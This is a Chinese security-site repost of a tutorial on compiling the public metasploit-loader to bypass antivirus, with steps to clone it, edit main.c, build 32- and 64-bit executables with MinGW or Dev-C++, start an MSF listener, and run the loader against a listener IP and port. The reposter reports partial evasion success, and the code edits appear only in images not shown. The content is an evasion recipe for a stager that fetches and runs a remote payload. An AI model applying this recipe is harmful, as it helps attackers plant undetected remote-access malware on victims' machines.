通过MSF加载器绕过AV

admin 2020年9月1日10:45:58评论213 views字数 785阅读2分37秒阅读模式

文章转自:

https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad

https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8

PS:这个metasploit-loader8年前的东西了,我测试了下32位的,被杀很多,不像原作者说的全免杀,不知道是不是伪造的,64位的能过一些,随机应变吧

32

git clone https://github.com/rsmudge/metasploit-loader.git

通过MSF加载器绕过AV

编辑metasploit-loader/master/src/main.cmain函数中,注释93-98行,修改99行如下

通过MSF加载器绕过AV

使用MinGW编译

i686-w64-mingw32-gccmain.c -o loadmeta.exe -lws2_32

通过MSF加载器绕过AV

通过MSF加载器绕过AV

执行

通过MSF加载器绕过AV

64

使用Dev C ++工具编译

https://sourceforge.net/projects/orwelldevcpp/

通过MSF加载器绕过AV

确保安装完整,同时拥有3264

通过MSF加载器绕过AV

新建一个Project Loader64并将文件另存为Loader64

Project设置为C Project,将应用程序设置为Console Application。从命令行执行

通过MSF加载器绕过AV

通过MSF加载器绕过AV

https://github.com/rsmudge/metasploit-loader/blob/master/src/main.c

粘贴进去

修改以下内容

通过MSF加载器绕过AV

#include <winsocks2.h>放在windows.h上面

通过MSF加载器绕过AV

编译选项中添加-lws2_32

通过MSF加载器绕过AV

F9编译

MSF监听

通过MSF加载器绕过AV

Windows上执行

Loader64.exe192.168.137.128 9500

通过MSF加载器绕过AV

通过MSF加载器绕过AV


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月1日10:45:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过MSF加载器绕过AVhttp://cn-sec.com/archives/114056.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息